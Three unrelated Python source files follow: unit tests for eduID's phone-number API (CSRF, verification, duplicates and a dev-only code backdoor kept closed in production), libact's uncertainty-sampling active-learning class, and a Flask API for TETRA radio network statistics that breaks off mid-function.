    body = json.loads(resp.data)
    self.assertEqual('POST_PHONE_NEW_SUCCESS', body['type'])
    added = body['payload']['phones'][2]
    self.assertEqual(u'+34670123456', added.get('number'))
    self.assertEqual(False, added.get('verified'))
def test_post_phone_no_country_code(self):
    """A national-format number gets the default country code (+46) prepended."""
    resp = self._post_phone(mod_data={'number': '0701234565'})
    self.assertEqual(resp.status_code, 200)
    body = json.loads(resp.data)
    self.assertEqual('POST_PHONE_NEW_SUCCESS', body['type'])
    added = body['payload']['phones'][2]
    self.assertEqual(u'+46701234565', added.get('number'))
    self.assertEqual(False, added.get('verified'))
def test_post_phone_wrong_csrf(self):
    """POST /new with a bad CSRF token must fail validation."""
    resp = self._post_phone(mod_data={'csrf_token': '<PASSWORD>'})
    self.assertEqual(resp.status_code, 200)
    body = json.loads(resp.data)
    self.assertEqual('POST_PHONE_NEW_FAIL', body['type'])
    self.assertEqual(['CSRF failed to validate'], body['payload']['error']['csrf_token'])
def test_post_phone_invalid(self):
    """POST /new with a malformed number is rejected by schema validation."""
    resp = self._post_phone(mod_data={'number': '0'})
    self.assertEqual(resp.status_code, 200)
    body = json.loads(resp.data)
    self.assertEqual('POST_PHONE_NEW_FAIL', body['type'])
    self.assertEqual(['phone.phone_format'], body['payload']['error']['number'])
def test_post_phone_as_verified(self):
    """A client-supplied verified=True flag is ignored by the backend."""
    resp = self._post_phone(mod_data={'verified': True})
    self.assertEqual(resp.status_code, 200)
    body = json.loads(resp.data)
    self.assertEqual('POST_PHONE_NEW_SUCCESS', body['type'])
    added = body['payload']['phones'][2]
    self.assertEqual(u'+34670123456', added.get('number'))
    self.assertFalse(added.get('verified'))
    self.assertFalse(added.get('primary'))
def test_post_phone_as_primary(self):
    """A client-supplied primary=True flag is ignored by the backend."""
    resp = self._post_phone(mod_data={'primary': True})
    self.assertEqual(resp.status_code, 200)
    body = json.loads(resp.data)
    self.assertEqual('POST_PHONE_NEW_SUCCESS', body['type'])
    added = body['payload']['phones'][2]
    self.assertEqual(u'+34670123456', added.get('number'))
    self.assertFalse(added.get('verified'))
    self.assertFalse(added.get('primary'))
def test_post_phone_bad_swedish_mobile(self):
    """A Swedish number that is not a valid mobile prefix is rejected."""
    resp = self._post_phone(mod_data={'number': '0711234565'})
    self.assertEqual(resp.status_code, 200)
    body = json.loads(resp.data)
    self.assertEqual('POST_PHONE_NEW_FAIL', body['type'])
    self.assertEqual(['phone.swedish_mobile_format'], body['payload']['error'].get('number'))
def test_post_phone_bad_country_code(self):
    """A 00-prefixed number fails the E.164 schema-level check."""
    resp = self._post_phone(mod_data={'number': '00711234565'})
    self.assertEqual(resp.status_code, 200)
    body = json.loads(resp.data)
    self.assertEqual('POST_PHONE_NEW_FAIL', body['type'])
    self.assertEqual(['phone.e164_format'], body['payload']['error'].get('_schema'))
def test_post_primary(self):
    """Setting the verified fixture number as primary succeeds."""
    resp = self._post_primary()
    self.assertEqual(resp.status_code, 200)
    body = json.loads(resp.data)
    self.assertEqual('POST_PHONE_PRIMARY_SUCCESS', body['type'])
    first, second = body['payload']['phones'][0], body['payload']['phones'][1]
    self.assertEqual(True, first['verified'])
    self.assertEqual(True, first['primary'])
    self.assertEqual(u'+34609609609', first['number'])
    self.assertEqual(False, second['verified'])
    self.assertEqual(False, second['primary'])
    self.assertEqual(u'+34 6096096096', second['number'])
def test_post_primary_no_csrf(self):
    """POST /primary with an empty CSRF token must fail validation."""
    resp = self._post_primary(mod_data={'csrf_token': ''})
    self.assertEqual(resp.status_code, 200)
    body = json.loads(resp.data)
    self.assertEqual('POST_PHONE_PRIMARY_FAIL', body['type'])
    self.assertEqual(['CSRF failed to validate'], body['payload']['error']['csrf_token'])
def test_post_primary_unknown(self):
    """Promoting a number the user does not have must fail."""
    resp = self._post_primary(mod_data={'number': '+66666666666'})
    self.assertEqual(resp.status_code, 200)
    body = json.loads(resp.data)
    self.assertEqual('POST_PHONE_PRIMARY_FAIL', body['type'])
    self.assertEqual(PhoneMsg.unknown_phone.value, body['payload']['message'])
def test_remove(self):
    """Removing the primary number leaves the other fixture number behind."""
    resp = self._remove()
    self.assertEqual(resp.status_code, 200)
    body = json.loads(resp.data)
    self.assertEqual('POST_PHONE_REMOVE_SUCCESS', body['type'])
    self.assertEqual(u'+34 6096096096', body['payload']['phones'][0].get('number'))
def test_remove_primary_other_unverified(self):
    """Removing the unverified number leaves only the primary one."""
    resp = self._remove(mod_data={'number': '+34 6096096096'})
    self.assertEqual(resp.status_code, 200)
    body = json.loads(resp.data)
    self.assertEqual('POST_PHONE_REMOVE_SUCCESS', body['type'])
    self.assertEqual(u'+34609609609', body['payload']['phones'][0].get('number'))
def test_remove_no_csrf(self):
    """POST /remove with an empty CSRF token must fail validation."""
    resp = self._remove(mod_data={'csrf_token': ''})
    self.assertEqual(resp.status_code, 200)
    body = json.loads(resp.data)
    self.assertEqual('POST_PHONE_REMOVE_FAIL', body['type'])
    self.assertEqual(['CSRF failed to validate'], body['payload']['error']['csrf_token'])
def test_remove_unknown(self):
    """Removing a number the user does not have must fail."""
    resp = self._remove(mod_data={'number': '+33333333333'})
    self.assertEqual(resp.status_code, 200)
    body = json.loads(resp.data)
    self.assertEqual('POST_PHONE_REMOVE_FAIL', body['type'])
    self.assertEqual('phones.unknown_phone', body['payload']['message'])
@patch('eduid_common.api.am.AmRelay.request_user_sync')
@patch('eduid_webapp.phone.verifications.get_short_hash')
@patch('eduid_common.api.msg.MsgRelay.sendsms')
def test_remove_primary_other_verified(self, mock_phone_validator, mock_code_verification, mock_request_user_sync):
    """Removing the primary number succeeds when another verified number exists."""
    mock_phone_validator.return_value = True
    mock_request_user_sync.side_effect = self.request_user_sync
    mock_code_verification.return_value = u'12345'
    # Unauthenticated request must redirect to the token service.
    response = self.browser.post('/remove')
    self.assertEqual(response.status_code, 302)  # Redirect to token service
    eppn = self.test_user_data['eduPersonPrincipalName']
    with self.session_cookie(self.browser, eppn) as client:
        # Step 1: add a second number.
        with self.app.test_request_context():
            with client.session_transaction() as sess:
                data = {
                    'number': u'+34609123321',
                    'verified': False,
                    'primary': False,
                    'csrf_token': sess.get_csrf_token(),
                }
            client.post('/new', data=json.dumps(data), content_type=self.content_type_json)
        # Step 2: verify it with the mocked code.
        with self.app.test_request_context():
            with client.session_transaction() as sess:
                data = {'number': u'+34609123321', 'code': u'12345', 'csrf_token': sess.get_csrf_token()}
            response2 = client.post('/verify', data=json.dumps(data), content_type=self.content_type_json)
            verify_phone_data = json.loads(response2.data)
            self.assertEqual('POST_PHONE_VERIFY_SUCCESS', verify_phone_data['type'])
        # Step 3: remove the original primary number.
        with self.app.test_request_context():
            with client.session_transaction() as sess:
                data = {'number': '+34609609609', 'csrf_token': sess.get_csrf_token()}
            response2 = client.post('/remove', data=json.dumps(data), content_type=self.content_type_json)
            self.assertEqual(response2.status_code, 200)
            delete_phone_data = json.loads(response2.data)
            self.assertEqual('POST_PHONE_REMOVE_SUCCESS', delete_phone_data['type'])
            self.assertEqual(u'+34 6096096096', delete_phone_data['payload']['phones'][0].get('number'))
def test_resend_code(self):
    """Re-sending a verification code for a known number succeeds."""
    # Unauthenticated request is bounced to the token service.
    resp = self.browser.post('/resend-code')
    self.assertEqual(resp.status_code, 302)  # Redirect to token service
    resp = self._resend_code()
    self.assertEqual(resp.status_code, 200)
    body = json.loads(resp.data)
    self.assertEqual('POST_PHONE_RESEND_CODE_SUCCESS', body['type'])
    self.assertEqual(u'+34609609609', body['payload']['phones'][0].get('number'))
    self.assertEqual(u'+34 6096096096', body['payload']['phones'][1].get('number'))
def test_resend_code_no_csrf(self):
    """POST /resend-code with a bad CSRF token must fail validation."""
    resp = self._resend_code(mod_data={'csrf_token': '<PASSWORD>'})
    self.assertEqual(resp.status_code, 200)
    body = json.loads(resp.data)
    self.assertEqual('POST_PHONE_RESEND_CODE_FAIL', body['type'])
    self.assertEqual(['CSRF failed to validate'], body['payload']['error']['csrf_token'])
def test_resend_code_unknown(self):
    """Re-sending a code for a number the user does not have must fail."""
    resp = self._resend_code(mod_data={'number': '+66666666666'})
    self.assertEqual(resp.status_code, 200)
    body = json.loads(resp.data)
    self.assertEqual('POST_PHONE_RESEND_CODE_FAIL', body['type'])
    self.assertEqual('user-out-of-sync', body['payload']['message'])
def test_resend_code_throttle(self):
    """A second resend inside the throttle window is rejected."""
    first = self._resend_code()
    self.assertEqual(first.status_code, 200)
    first_body = json.loads(first.data)
    self.assertEqual('POST_PHONE_RESEND_CODE_SUCCESS', first_body['type'])
    self.assertEqual(u'+34609609609', first_body['payload']['phones'][0].get('number'))
    self.assertEqual(u'+34 6096096096', first_body['payload']['phones'][1].get('number'))
    # Immediately resend again - the previous code is still valid.
    second = self._resend_code()
    self.assertEqual(second.status_code, 200)
    second_body = json.loads(second.data)
    self.assertEqual('POST_PHONE_RESEND_CODE_FAIL', second_body['type'])
    self.assertEqual(second_body['error'], True)
    self.assertEqual(second_body['payload']['message'], 'still-valid-code')
    self.assertIsNotNone(second_body['payload']['csrf_token'])
@patch('eduid_common.api.am.AmRelay.request_user_sync')
@patch('eduid_webapp.phone.verifications.get_short_hash')
@patch('eduid_common.api.msg.MsgRelay.sendsms')
def test_verify(self, mock_phone_validator, mock_code_verification, mock_request_user_sync):
    """Verifying a newly added number with the correct code succeeds."""
    mock_phone_validator.return_value = True
    mock_request_user_sync.side_effect = self.request_user_sync
    mock_code_verification.return_value = u'12345'
    # Unauthenticated request must redirect to the token service.
    response = self.browser.post('/verify')
    self.assertEqual(response.status_code, 302)  # Redirect to token service
    eppn = self.test_user_data['eduPersonPrincipalName']
    with self.session_cookie(self.browser, eppn) as client:
        # Step 1: add a new, unverified number.
        with self.app.test_request_context():
            with client.session_transaction() as sess:
                data = {
                    'number': u'+34609123321',
                    'verified': False,
                    'primary': False,
                    'csrf_token': sess.get_csrf_token(),
                }
            client.post('/new', data=json.dumps(data), content_type=self.content_type_json)
        # Step 2: verify it with the mocked code.
        with self.app.test_request_context():
            with client.session_transaction() as sess:
                data = {'number': u'+34609123321', 'code': u'12345', 'csrf_token': sess.get_csrf_token()}
            response2 = client.post('/verify', data=json.dumps(data), content_type=self.content_type_json)
            verify_phone_data = json.loads(response2.data)
            self.assertEqual('POST_PHONE_VERIFY_SUCCESS', verify_phone_data['type'])
            self.assertEqual(u'+34609123321', verify_phone_data['payload']['phones'][2]['number'])
            self.assertEqual(True, verify_phone_data['payload']['phones'][2]['verified'])
            self.assertEqual(False, verify_phone_data['payload']['phones'][2]['primary'])
            # A successful verification is recorded in the proofing log.
            self.assertEqual(self.app.proofing_log.db_count(), 1)
@patch('eduid_common.api.am.AmRelay.request_user_sync')
@patch('eduid_webapp.phone.verifications.get_short_hash')
@patch('eduid_common.api.msg.MsgRelay.sendsms')
def test_verify_fail(self, mock_phone_validator, mock_code_verification, mock_request_user_sync):
    """Verifying with a wrong code fails and logs no proofing event."""
    mock_phone_validator.return_value = True
    mock_request_user_sync.side_effect = self.request_user_sync
    mock_code_verification.return_value = u'12345'
    # Unauthenticated request must redirect to the token service.
    response = self.browser.post('/verify')
    self.assertEqual(response.status_code, 302)  # Redirect to token service
    eppn = self.test_user_data['eduPersonPrincipalName']
    with self.session_cookie(self.browser, eppn) as client:
        # Step 1: add a new, unverified number.
        with self.app.test_request_context():
            with client.session_transaction() as sess:
                data = {
                    'number': u'+34609123321',
                    'verified': False,
                    'primary': False,
                    'csrf_token': sess.get_csrf_token(),
                }
            client.post('/new', data=json.dumps(data), content_type=self.content_type_json)
        # Step 2: attempt verification with the wrong code.
        with self.app.test_request_context():
            with client.session_transaction() as sess:
                data = {'number': u'+34609123321', 'code': u'wrong_code', 'csrf_token': sess.get_csrf_token()}
            response2 = client.post('/verify', data=json.dumps(data), content_type=self.content_type_json)
            verify_phone_data = json.loads(response2.data)
            self.assertEqual(verify_phone_data['type'], 'POST_PHONE_VERIFY_FAIL')
            self.assertEqual(verify_phone_data['payload']['message'], 'phones.code_invalid_or_expired')
            self.assertEqual(self.app.proofing_log.db_count(), 0)
def test_post_phone_duplicated_number(self):
    """Adding the same national-format number twice is rejected the second time."""
    data = {'number': '0701234565'}
    first = self._post_phone(mod_data=data)
    self.assertEqual(first.status_code, 200)
    first_body = json.loads(first.data)
    self.assertEqual('POST_PHONE_NEW_SUCCESS', first_body['type'])
    added = first_body['payload']['phones'][2]
    self.assertEqual(u'+46701234565', added.get('number'))
    self.assertEqual(False, added.get('verified'))
    # Sync the user so the first number is persisted in the central db.
    eppn = self.test_user_data['eduPersonPrincipalName']
    user = self.app.private_userdb.get_user_by_eppn(eppn)
    self.request_user_sync(user)
    second = self._post_phone(mod_data=data)
    self.assertEqual(second.status_code, 200)
    second_body = json.loads(second.data)
    self.assertEqual('POST_PHONE_NEW_FAIL', second_body['type'])
    self.assertEqual(['phone.phone_duplicated'], second_body['payload']['error'].get('number'))
def test_post_phone_duplicated_number_e_164(self):
    """An E.164 number followed by its national form is detected as a duplicate."""
    first = self._post_phone(mod_data={'number': '+46701234565'})  # e164 format
    self.assertEqual(first.status_code, 200)
    first_body = json.loads(first.data)
    self.assertEqual('POST_PHONE_NEW_SUCCESS', first_body['type'])
    added = first_body['payload']['phones'][2]
    self.assertEqual('+46701234565', added.get('number'))
    self.assertEqual(False, added.get('verified'))
    # Sync the user so the first number is persisted in the central db.
    eppn = self.test_user_data['eduPersonPrincipalName']
    user = self.app.private_userdb.get_user_by_eppn(eppn)
    self.request_user_sync(user)
    second = self._post_phone(mod_data={'number': '0701234565'})  # national format
    self.assertEqual(second.status_code, 200)
    second_body = json.loads(second.data)
    self.assertEqual('POST_PHONE_NEW_FAIL', second_body['type'])
    self.assertEqual(['phone.phone_duplicated'], second_body['payload']['error'].get('number'))
def test_post_phone_duplicated_number_e_164_2(self):
    """A number added in national format must also block its E.164 twin.

    Mirror image of test_post_phone_duplicated_number_e_164.
    (The original in-line comments had the two formats swapped.)
    """
    first = self._post_phone(mod_data={'number': '0701234565'})  # national format
    self.assertEqual(first.status_code, 200)
    first_body = json.loads(first.data)
    self.assertEqual('POST_PHONE_NEW_SUCCESS', first_body['type'])
    self.assertEqual('+46701234565', first_body['payload']['phones'][2].get('number'))
    self.assertEqual(False, first_body['payload']['phones'][2].get('verified'))

    # Sync the new number to the central user db before the duplicate attempt.
    eppn = self.test_user_data['eduPersonPrincipalName']
    user = self.app.private_userdb.get_user_by_eppn(eppn)
    self.request_user_sync(user)

    second = self._post_phone(mod_data={'number': '+46701234565'})  # E.164 format
    self.assertEqual(second.status_code, 200)
    second_body = json.loads(second.data)
    self.assertEqual('POST_PHONE_NEW_FAIL', second_body['type'])
    self.assertEqual(['phone.phone_duplicated'], second_body['payload']['error'].get('number'))
def test_get_code_backdoor(self):
    """With magic cookie fully configured in dev, the raw code is exposed."""
    self.app.conf.magic_cookie = 'magic-cookie'
    self.app.conf.magic_cookie_name = 'magic'
    self.app.conf.environment = 'dev'

    resp = self._get_code_backdoor(code='0123456')
    self.assertEqual(resp.status_code, 200)
    self.assertEqual(resp.data, '0123456'.encode('ascii'))
def test_get_code_no_backdoor_in_pro(self):
    """The backdoor must stay closed in the production environment."""
    self.app.conf.magic_cookie = 'magic-cookie'
    self.app.conf.magic_cookie_name = 'magic'
    self.app.conf.environment = 'pro'

    resp = self._get_code_backdoor(code='0123456')
    self.assertEqual(resp.status_code, 400)
def test_get_code_no_backdoor_misconfigured1(self):
    """An empty cookie name disables the backdoor even in dev."""
    self.app.conf.magic_cookie = 'magic-cookie'
    self.app.conf.magic_cookie_name = ''
    self.app.conf.environment = 'dev'

    resp = self._get_code_backdoor(code='0123456')
    self.assertEqual(resp.status_code, 400)
def test_get_code_no_backdoor_misconfigured2(self):
    """An empty cookie value disables the backdoor even in dev."""
    self.app.conf.magic_cookie = ''
    self.app.conf.magic_cookie_name = 'magic'
    self.app.conf.environment = 'dev'

    resp = self._get_code_backdoor(code='0123456')
    self.assertEqual(resp.status_code, 400)
|
""" Uncertainty Sampling
This module contains a class that implements two of the most well-known
uncertainty sampling query strategies: the least confidence method and the
smallest margin method (margin sampling).
"""
import numpy as np
from libact.base.interfaces import QueryStrategy, ContinuousModel, \
ProbabilisticModel
from libact.utils import inherit_docstring_from, zip
class UncertaintySampling(QueryStrategy):
    """Uncertainty Sampling

    This class implements Uncertainty Sampling active learning algorithm [1]_.

    Parameters
    ----------
    model: :py:class:`libact.base.interfaces.ContinuousModel` or :py:class:`libact.base.interfaces.ProbabilisticModel` object instance
        The base model used for training.

    method: {'lc', 'sm', 'entropy'}, optional (default='lc')
        least confidence (lc), it queries the instance whose posterior
        probability of being positive is nearest 0.5 (for binary
        classification);
        smallest margin (sm), it queries the instance whose posterior
        probability gap between the most and the second probable labels is
        minimal;
        entropy, requires :py:class:`libact.base.interfaces.ProbabilisticModel`
        to be passed in as model parameter;

    Attributes
    ----------
    model: :py:class:`libact.base.interfaces.ContinuousModel` or :py:class:`libact.base.interfaces.ProbabilisticModel` object instance
        The model trained in last query.

    Examples
    --------
    Here is an example of declaring a UncertaintySampling query_strategy
    object:

    .. code-block:: python

       from libact.query_strategies import UncertaintySampling
       from libact.models import LogisticRegression

       qs = UncertaintySampling(
                dataset, # Dataset object
                model=LogisticRegression(C=0.1)
            )

    Note that the model given in the :code:`model` parameter must be a
    :py:class:`ContinuousModel` which supports predict_real method.

    References
    ----------
    .. [1] <NAME>. "Active learning literature survey." University of
           Wisconsin, Madison 52.55-66 (2010): 11.
    """

    def __init__(self, *args, **kwargs):
        super(UncertaintySampling, self).__init__(*args, **kwargs)

        # NOTE(review): 'model' is popped *after* the base __init__ already
        # received **kwargs; presumably the base class ignores unknown
        # keyword arguments — confirm against QueryStrategy.__init__.
        self.model = kwargs.pop('model', None)
        if self.model is None:
            raise TypeError(
                "__init__() missing required keyword-only argument: 'model'"
            )
        if not isinstance(self.model, ContinuousModel) and \
                not isinstance(self.model, ProbabilisticModel):
            raise TypeError(
                "model has to be a ContinuousModel or ProbabilisticModel"
            )

        # Train once up-front on the (possibly partially labeled) dataset;
        # _get_scores retrains on every query as labels accumulate.
        self.model.train(self.dataset)

        self.method = kwargs.pop('method', 'lc')
        if self.method not in ['lc', 'sm', 'entropy']:
            raise TypeError(
                "supported methods are ['lc', 'sm', 'entropy'], the given one "
                "is: " + self.method
            )

        # Entropy needs true class probabilities, not raw decision values.
        if self.method=='entropy' and \
                not isinstance(self.model, ProbabilisticModel):
            raise TypeError(
                "method 'entropy' requires model to be a ProbabilisticModel"
            )

    def _get_scores(self):
        """Retrain the model and score every unlabeled entry.

        Returns an iterator of (entry_id, score) pairs; larger score means
        the entry is more informative under the configured method.
        """
        dataset = self.dataset
        self.model.train(dataset)
        unlabeled_entry_ids, X_pool = dataset.get_unlabeled_entries()

        # Probabilities if available, otherwise raw decision values.
        if isinstance(self.model, ProbabilisticModel):
            dvalue = self.model.predict_proba(X_pool)
        elif isinstance(self.model, ContinuousModel):
            dvalue = self.model.predict_real(X_pool)

        if self.method == 'lc':  # least confident
            # Low top-class confidence => high score.
            score = -np.max(dvalue, axis=1)

        elif self.method == 'sm':  # smallest margin
            if np.shape(dvalue)[1] > 2:
                # Find 2 largest decision values
                dvalue = -(np.partition(-dvalue, 2, axis=1)[:, :2])
            # Small gap between top-2 classes => high score.
            score = -np.abs(dvalue[:, 0] - dvalue[:, 1])

        elif self.method == 'entropy':
            # Shannon entropy of the predicted distribution.
            # NOTE(review): yields nan when a predicted probability is
            # exactly 0 (0 * log 0) — upstream behavior, kept as-is.
            score = np.sum(-dvalue * np.log(dvalue), axis=1)
        return zip(unlabeled_entry_ids, score)

    def make_query(self, return_score=False):
        """Return the index of the sample to be queried and labeled and
        selection score of each sample. Read-only.

        No modification to the internal states.

        Returns
        -------
        ask_id : int
            The index of the next unlabeled sample to be queried and labeled.

        score : list of (index, score) tuple
            Selection score of unlabled entries, the larger the better.
        """
        dataset = self.dataset
        # unlabeled_entry_ids, _ = dataset.get_unlabeled_entries()

        unlabeled_entry_ids, scores = zip(*self._get_scores())
        # Query the entry with the highest informativeness score.
        ask_id = np.argmax(scores)

        if return_score:
            return unlabeled_entry_ids[ask_id], \
                   list(zip(unlabeled_entry_ids, scores))
        else:
            return unlabeled_entry_ids[ask_id]
|
<gh_stars>1-10
from pymongo.collection import ReturnDocument
from flask_restful import Resource, reqparse
import pymongo
from bson.json_util import dumps
import json
from flask import jsonify, Response
import datetime
from routes.tetra import track, calls_group, calls_subscriber, calls_detail
'''
All the Tetra API endpoints
'''
class node_load(Resource):
    '''
    GET the node load data for the bar graph
    '''

    def __init__(self, **kwargs):
        self.DB = kwargs['DB']
        self.env = kwargs['env']

    def get(self):
        """Return the node-load document pre-formatted for the eCharts bar graph."""
        document = self.DB['tetra_node_load'].find_one({'type': 'bar'})
        return jsonify(json.loads(dumps(document)))
class node_subscribers(Resource):
    '''
    GET the total subscriber count per node
    '''

    def __init__(self, **kwargs):
        self.DB = kwargs['DB']
        self.env = kwargs['env']

    def get(self):
        """Return per-node subscriber counts pre-formatted for the eCharts bar graph."""
        document = self.DB['tetra_node_subscribers'].find_one({'type': 'bar'})
        return jsonify(json.loads(dumps(document)))
class ts_load(Resource):
    '''
    GET the total timeslot usage count
    '''

    def __init__(self, **kwargs):
        self.DB = kwargs['DB']
        self.env = kwargs['env']

    def get(self):
        """Return timeslot usage pre-formatted for the eCharts radar chart."""
        document = self.DB['tetra_node_load'].find_one({'type': 'radar'})
        return jsonify(json.loads(dumps(document)))
class radio_count(Resource):
    '''
    GET the online radio count
    '''

    def __init__(self, **kwargs):
        self.DB = kwargs['DB']
        self.env = kwargs['env']

    def get(self, node):
        """Return the online radio count for *node* ('all' for the total)."""
        count_doc = self.DB['tetra_radio_count'].find_one({'node': node})
        return jsonify(json.loads(dumps(count_doc)))
class subscribers(Resource):
    '''
    GET the subscriber list
    '''

    def __init__(self, **kwargs):
        self.DB = kwargs['DB']
        self.env = kwargs['env']

    def get(self):
        """Return every subscriber document (without _id), ordered by ssi."""
        cursor = (self.DB['tetra_subscribers']
                  .find({}, {'_id': False})
                  .sort("ssi", pymongo.ASCENDING))
        return jsonify(json.loads(dumps(cursor)))
class call_stats(Resource):
    '''
    GET the call count stats
    '''

    def __init__(self, **kwargs):
        self.DB = kwargs['DB']
        self.env = kwargs['env']

    def get(self, call_type, range_sec):
        """Return call-count stats for one call type (group/individual/SDS) and range."""
        stats_doc = self.DB['tetra_call_stats'].find_one(
            {'type': call_type, 'range_sec': range_sec},
            {'_id': False},
        )
        return jsonify(json.loads(dumps(stats_doc)))
class call_history(Resource):
    '''
    GET the call count history for a time range
    '''

    def __init__(self, **kwargs):
        self.DB = kwargs['DB']
        self.env = kwargs['env']

    def get(self, time_range):
        """Return group/individual call history; *time_range* is seconds back from now."""
        history_doc = self.DB['tetra_call_stats'].find_one(
            {'type': 'history', 'range': time_range},
            {'_id': False},
        )
        return jsonify(json.loads(dumps(history_doc)))
class subscriber_detail(Resource):
    '''
    GET subscriber information details
    '''

    def __init__(self, **kwargs):
        self.DB = kwargs['DB']
        self.env = kwargs['env']

    def get(self, issi):
        """Return the latest GPS/SDS detail for one subscriber, or gps=False."""
        # Newest SDS record for this subscriber.
        cursor = self.DB['sds_data'].find(
            filter={'issi': int(issi)},
            sort=[('unix', -1)],
            limit=1,
        )
        try:
            latest = cursor[0]
            # Fixed +8 hour display offset applied to the stored timestamp.
            timestamp = str(latest['processed_time'] + datetime.timedelta(hours=8))
            lat = latest['decimal_degrees']['latitude']
            lon = latest['decimal_degrees']['longitude']
            detail = {
                'timestamp': timestamp,
                'node': latest['node'],
                'gps': True,
                'rssi': latest['rssi'],
                'location': latest['decimal_degrees'],
                'maps_url': f"https://www.google.com/maps/search/?api=1&query={lat},{lon}",
                'accuracy': latest['uncertainty'],
                'velocity': latest['velocity'],
                'direction': latest['direction'],
                'angle': latest['angle'],
            }
        except IndexError:
            # No SDS data recorded for this ISSI.
            detail = {
                'gps': False,
            }
        return jsonify(json.loads(dumps(detail)))
class subscriber_update(Resource):
    '''
    POST subscriber comment info
    '''

    def __init__(self, **kwargs):
        self.DB = kwargs['DB']
        self.env = kwargs['env']

    def post(self):
        """Upsert a subscriber's comment and log the change for history.

        Form data: ``ssi`` (subscriber id, int-like) and ``comment``.
        Returns a ``{'success': bool, 'message': str}`` dict; failures
        (e.g. a non-numeric ssi) are reported in the message rather than
        as an HTTP error.
        """
        # Initilize request parser
        parser = reqparse.RequestParser()
        # Parse arguments from form data
        parser.add_argument("ssi")
        parser.add_argument("comment")
        args = parser.parse_args()
        try:
            new = self.DB['tetra_subscribers'].find_one_and_update(
                {
                    "ssi": int(args['ssi']),
                },
                {
                    "$set":
                        {
                            "comment": args['comment'],
                        }
                },
                upsert=True,
                return_document=ReturnDocument.AFTER,
            )
            # Keep only the fields relevant for the change-history record.
            for key in ('_id', 'node', 'group', 'talkgroup', 'gps', 'count'):
                new.pop(key, None)
            new['timestamp'] = datetime.datetime.utcnow()
            # BUG FIX: Collection.insert() was deprecated in PyMongo 3.0 and
            # removed in PyMongo 4.x — use insert_one() instead.
            self.DB['tetra_subscriber_changes'].insert_one(new)
            return({'success': True, 'message': 'Updated {}'.format(args['ssi'])})
        except Exception as e:
            # Broad catch is deliberate: this endpoint always answers with a
            # success flag instead of a 500.
            return({'success': False, 'message': f'{str(e)}'})
class subscriber_kml_check(Resource):
    '''
    GET for pre-checking GPS points
    '''

    def __init__(self, **kwargs):
        self.DB = kwargs['DB']
        self.env = kwargs['env']

    def get(self, params):
        """Pre-check GPS track data for an issi/start/end range (delegates to track.check)."""
        parser = reqparse.RequestParser()
        for field in ("issi", "start", "end"):
            parser.add_argument(field)
        args = parser.parse_args()
        result = track.check(args, self.DB, self.env)
        return jsonify(json.loads(dumps(result)))
class subscriber_kml(Resource):
    '''
    GET for generating a .kml track for an individual subscriber
    '''

    def __init__(self, **kwargs):
        self.DB = kwargs['DB']
        self.env = kwargs['env']

    def get(self, params):
        """Generate a downloadable .kml track for issi between start and end."""
        parser = reqparse.RequestParser()
        for field in ("issi", "start", "end"):
            parser.add_argument(field)
        args = parser.parse_args()
        kml_filename = f"{args['issi']} - {args['start']}-{args['end']}.kml"
        try:
            kml_file = track.get(args, self.DB, self.env)
            if not kml_file:
                return {'success': False, 'message': "No data found."}
            # Serve the generated document as a .kml attachment.
            return Response(
                kml_file,
                mimetype="application/vnd.google-earth.kml+xml",
                headers={"Content-disposition": f"attachment; filename={kml_filename}"},
            )
        except Exception as e:
            # Report generation errors in-band instead of a 500.
            return {'success': False, 'message': f"{e}"}
class subscriber_kml_tetrage(Resource):
    '''
    GET for generating the live .kml file
    '''

    def __init__(self, **kwargs):
        self.DB = kwargs['DB']
        self.env = kwargs['env']

    def get(self):
        """Serve the pre-generated live TetraGE .kml stored in MongoDB."""
        document = self.DB['tetra_kml'].find_one({'type': 'tetrage'})
        return Response(
            document['data'],
            mimetype="application/vnd.google-earth.kml+xml",
            headers={"Content-disposition": "attachment; filename=TetraGE.kml"},
        )
class tetra_replication(Resource):
    '''
    GET for the tetra replication status
    '''

    def __init__(self, **kwargs):
        self.DB = kwargs['DB']
        self.env = kwargs['env']

    def get(self):
        """Return the live replication status with an ISO replication date."""
        cursor = self.DB['tetra_replication'].find({"type": 'live'})
        try:
            status = list(cursor)[0]
            # Replication date = sample time minus the reported lag.
            lag = datetime.timedelta(seconds=status['Seconds_Behind_Master'])
            status['replication_date'] = (status['datetime'] - lag).isoformat()
            status['datetime'] = status['datetime'].isoformat()
        except IndexError:
            # No live status document yet: report "now" for both fields.
            status = {
                'replication_date': datetime.datetime.now().isoformat(),
                'datetime': datetime.datetime.now().isoformat(),
            }
        return jsonify(json.loads(dumps(status)))
class tetra_replication_history(Resource):
    '''
    GET the historical replication delay
    '''

    def __init__(self, **kwargs):
        self.DB = kwargs['DB']
        self.env = kwargs['env']

    def get(self):
        """Return [timestamp, delay] pairs for the last 24h, newest first."""
        window_start = datetime.datetime.now() - datetime.timedelta(
            hours=24 + self.env.hour_offset)
        rows = self.DB['tetra_replication'].find(
            {'datetime': {'$gte': window_start}}
        ).sort("datetime", pymongo.DESCENDING)

        history = []
        delay = 0
        for row in rows:
            try:
                delay = row['Seconds_Behind_Master']
            except KeyError:
                # Sample missing the field: carry the previous delay forward.
                pass
            stamp = datetime.datetime.strftime(row['datetime'], '%Y/%m/%d %H:%M:%S')
            history.append([stamp, delay])
        return jsonify(json.loads(dumps(history)))
class tetra_subscriber_changes(Resource):
    '''
    GET the tetra subscriber change history
    Either a specific issi or all
    '''

    def __init__(self, **kwargs):
        self.DB = kwargs['DB']
        self.env = kwargs['env']

    def get(self, params):
        """Return change records in [start, end]; filtered by ssi when given."""
        parser = reqparse.RequestParser()
        for field in ("ssi", "start", "end"):
            parser.add_argument(field)
        args = parser.parse_args()

        # Convert the local-time request window to stored (offset-free) time.
        offset = datetime.timedelta(hours=self.env.hour_offset)
        start = datetime.datetime.strptime(args['start'], '%Y%m%d%H%M%S') - offset
        end = datetime.datetime.strptime(args['end'], '%Y%m%d%H%M%S') - offset

        query = {'timestamp': {'$gte': start, '$lte': end}}
        if args['ssi']:
            query['ssi'] = int(args['ssi'])

        rows = self.DB['tetra_subscriber_changes'].find(
            query,
            sort=[('timestamp', pymongo.DESCENDING)],
        )
        final_response = []
        for row in rows:
            # Re-apply the display offset for the human-readable date.
            local_ts = row['timestamp'] + offset
            row['date'] = datetime.datetime.strftime(local_ts, '%Y/%m/%d %H:%M:%S')
            final_response.append(row)
        return jsonify(json.loads(dumps(final_response)))
class tetra_node_overview(Resource):
    '''
    Tetra nodes overview
    '''

    def __init__(self, **kwargs):
        self.DB = kwargs['DB']
        self.env = kwargs['env']

    def get(self):
